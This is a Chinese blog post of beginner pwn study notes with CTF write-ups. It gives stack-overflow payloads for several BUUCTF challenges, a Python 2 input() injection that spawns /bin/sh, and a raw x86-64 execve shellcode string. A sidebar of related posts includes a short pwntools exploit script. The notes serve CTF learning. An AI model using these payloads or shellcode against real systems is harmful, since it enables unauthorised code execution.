Pwn学习笔记

最新推荐文章于 2023-06-23 18:32:33 发布
最新推荐文章于 2023-06-23 18:32:33 发布
阅读量143 收藏
点赞数
分类专栏: pwn 文章标签: 学习
--simon
本文链接:https://blog.csdn.net/qq_38177830/article/details/127669387
版权

寄存器

EAX
EBX
ECX
EDX
EDI
ESI
EBP指向系统栈最上面一个栈帧的底部。
ESP保存当前 Stack 的地址

在这里插入图片描述

汇编指令

指令平台作用
ucomissx86浮点比较
ParagraphTextAnd more

shallcode

char * input = (char *) malloc(sizeof(char)*256);
read(0, input, 256);
((void (*)())(input))();

把字符串当函数执行,直接跑shallcode脚本,然后手动cat flag

payload = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

python2 input
    while True:
        input(">")

python2的input() 能自动识别出输入的类型,将输入内容转换为对应类型(str、int、float)

输入3+2返回就是5

写脚本 import(‘os’).system(‘/bin/sh’)

然后cat flag

gets返回覆盖

warmup_csaw_2016

脚本如下gets中的录入长度+ebp大小(64位是8)+p64(被调函数地址)

payload = b’a’ * (0x40 + 8) + p64(0x400611)

在这里插入图片描述

gets任意写

ciscn_2019_n_1

在这里插入图片描述

v2开始位置是rbp-4h

v1开始位置是rbp-30h

需要覆盖0x30-0x4=44

在这里插入图片描述

发现func函数的浮点比较命令,跳转dword_4007F4,可以拿到11.28125对应的十六进制41348000h

payload = b"A" * 44 + p64(0x41348000)

printf溢出读

pwn1_sctf_2016

在这里插入图片描述

s大小位3C即60

而fgets限制输入32

发现18行有一个替换操作,猜想"I"被替代为了"You"

nc连接发现确实是这样

那可以构建

payload = b"I" * 20 + b’a’ * 4 + p64(0x8048F0D)

read任意读

StackOverFlow

在这里插入图片描述

没啥说的,注意一下32位程序,ebp是4

payload = b"a" * (72 + 4) + p32(0x8048EE0)

有头发的琦玉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记
x86架构中UCOMISS浮点比较指令所产生的条件码
zenny_chen的专栏
11-10 3509
Intel官方编程指南已经对通用算术比较指令所产生的条件码已经描述得非常详细了,在《Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 1: Basic Architecture》中的附录B。 各位也可以通过直接搜索 “condition code” 来搜索到相关内容。 但是,此文档对浮点数比较所引发的EFLAGS标志位的变化所对应的条件码几乎没怎么描述,因此本博文将详细列出 UCOMISS 指令所对应可用的条件码。 UC
PWN入门笔记
WuXianYo_的博客
03-10 138
PWN入门笔记
BUU刷题-Pwn-ciscn_2019_n_1
一个啥也不会的小菜鸡!
06-23 91
在rodate段,可以找到11.28125的十六进制表示形式为0x41348000h。要将V2变为11.28125,必须知道11.28125的十六进制表示形式。利用栈溢出覆盖v2改变其,获得flag。[[双精度浮点数存储]]
pwn基础知识笔记
月阴荒的博客
02-20 2279
算是总的开一篇文章,把学到的知识总结一下,之后会重复写到各个文章里面 checksec指令, 用来查询pwn题目的壳和保护,并且能够看到程序的信息 1.Canary保护 参考链接:https://blog.csdn.net/weixin_44540286/article/details/101629735?utm_source=distribute.pc_relevant.none-task Ca...
2021 rois暑假集训——栈溢出与简单的rop链(buuctf练习)
weixin_56780239的博客
08-07 1106
2021年暑假参加集训,在buuctf上做的几道题的writeup.
pwn学习历程.pdf
09-30
pwn学习修炼之旅,内部包含各个模块各个知识点,有助于爱好者有方向的学习前进,加油,很好的资料哦,很有意义。
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习入门详解PPT
04-17
包括Windows内核学习,格式化字符串,栈溢出等方面
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
PWN学习总结(不断完善中)(有道云笔记
tbsqigongzi的博客
04-26 3298
学习路线 pwn一些概念理解 王爽汇编学习笔记 DOS-BOX及编译工具–百度网盘 提取码: ajba linux知识学习(CTF主要考察linux环境下的漏洞利用)—菜鸟教程 nala包管理命令(个人感觉比apt好用) python知识学习(写exp用)----菜鸟教程 gcc编译过程(了解一下) vim用法(好难,正在学) pacvim游戏 ctf-wiki-pwn漏洞利用总结图 刷题网站 BUUCTF BUUCTF—libc源码 攻防世界 pwn环境搭建 借用另一个博主的pwn环境配置文章 再加上几个
PWN学习笔记
qamcwc的博客
01-22 4037
一些名词介绍 exploit :用于攻击的脚本与方案 payload :利用漏洞时构造的恶意数据 shellcode :包含在恶意数据中的机器码(机器码在攻击时拿到shell) 程序的编译与链接 目前,软件世界有40%的漏洞是由C和C++写成的 cat +文件名 :输出文件内容 elf :Linux下可执行文件格式 从C源代码到可执行文件的生成过程 C源代码经过编译成为汇编代码,汇编代码再经过汇编成为机器码,即生成一个elf(二进制)目标文件,进行链接后成为elf可执行文件 可.
ciscn_2019_n_1
weixin_52034946的博客
01-15 405
检查,64位 ida查看 又是gets函数,思路来了,一直输入挤满栈,直到v2处输入11.28125 11.28125的16进制转换是 0x41348000h 脚本 from pwn import* r = remote(“node3.buuoj.cn”,29950) flag_addr = 0x41348000 payload = “a”*(0x30-0x4)+p64(flag_addr) r.sendline(payload) r.interactive() 0x30 - 0x4 就是v1到v2处的空
BUUCTF ciscn_2019_n_1
RookieMOR的博客
05-14 581
1.下载文件,用checksec一下: 2.用IDA64查看,进入func函数: 当v2=11.28125时获得flag,但只有v1的输入,没有v2输入。因为有一个gets函数,点击v1,v2可以知道,v1与v2差44个字节,可以通过输入v1的去改变v2的,实现栈溢出。 查看汇编可以看到有一个uconiss的比较指令,把xmm0与cs:dword_4007F4,由movss可以知道xmme0是v1或v2的,那么点击dword_4007F4 看到一个 dd ,百度一下可以知道,.
PWN-汇编学习笔记
yajuanpi4899的博客
01-09 3250
目录 一、汇编和PWN的关系 二、常用知识点 三、windows下搭建debug实验环境 一、汇编和PWN的关系 PWN需要对逆向了解,调试模式中会产生大量的汇编代码解读,需要对汇编有一定的基础。本文基于《汇编语言》第四版 王爽 一书进行一定知识点的提取和总结。 二、常用知识点 8086的CPU通用寄存器均为16位,可以存放两个字节,AX,BX,CX,DX四个寄存器存一般性数据。 ah:AX高位寄存器 al:AX地位寄存器 字节(byte):8位bit,存在8位寄存器中 字(wo
Pwn笔记
caterpillarous的博客
04-18 2626
Pwn笔记 -前言 以下内容摘自Wiki: Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。 在骇客行话里,尤其在另外一种电脑技术方面,包括电脑(服务器或...
【Writeup】i春秋 Linux Pwn 入门教程_EasyCTF 2017-doubly_dangerous
BAKUMANSEC - Just Do It
08-20 770
Linux pwn入门教程(1)——栈溢出基础 0x01 解题思路 查看文件信息并试运行 ​ 开启了NX,栈上无法执行代码。 拖入IDA 32bits,F5查看 ​ main 显然存在栈溢出漏洞,目前存在两种思路: 覆盖RIP为give_flag地址,执行give_flag函数 覆盖v5的为11.28125,使其通过判断执行give_flag函数 通过尝试发现,按...
英飞凌TC264学习PWN
10-18
好的,关于英飞凌TC264学习PWN,我可以给你一些指导。 首先,PWN是指利用程序漏洞进行攻击的技术,通常用于渗透测试和漏洞挖掘。而英飞凌TC264是一款基于ARM Cortex-M4内核的微控制器,它的安全性取决于程序的编写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

有头发的琦玉

打点钱,我会再努力的

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值